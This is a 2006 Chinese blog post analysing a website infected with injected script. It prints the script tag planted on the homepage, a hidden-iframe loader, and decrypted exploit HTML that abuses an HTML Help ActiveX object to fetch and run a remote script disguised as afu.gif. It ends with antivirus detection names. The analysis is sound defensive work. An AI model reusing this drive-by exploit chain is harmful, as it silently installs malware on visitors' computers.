[2006-03-22]又发现一个带毒网站(第3版)

endurer 原创

2006-03-22 第3版 补充:瑞星对afu.gif的回复。
2006-03-16 第2版 补充:Kaspersky对afu.gif的反应。
2006-03-14 第1

首页被插入代码:



<script language="javascript" src=" http://www.***3core.com/images/gif.js">



http://www.***3core.com/images/gif.js的代码为:


document.write("<iframe src=http://www.***3core.com/images/error.htm width=0 height=0></iframe>");


http://www.***3core.com/images/error.htm(Kaspersky报为Trojan-Downloader.JS.Agent.e)的内容为加密的脚本,解密后为:



<!--
var Words ="<script>document.write(unescape('<HTML>
<head>
</head>
<BODY>
<div style="display:none">
<OBJECT id="f1"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:/WINDOWS/Help/apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language%20%3D%20JScript src=///" http://www.***3core.com/images/afu.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
f1.Click();setTimeout("f2.Click();",0);
</script>
</BODY>
</HTML>'));</script>"

function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->


这个error.htm的内容与

小心借情人节传播的QQ尾巴

中的afu.htm相似,同样是下载一个名为afu.gif的文件。

Kaspersky将afu.gif报为Exploit.VBS.Phel.bq

瑞星的回复:

主 题:病毒上报邮件分析结果-流水单号:2141352

尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。

我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:afu.gif
病毒名:Exploit.VBS.Phel.cd

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值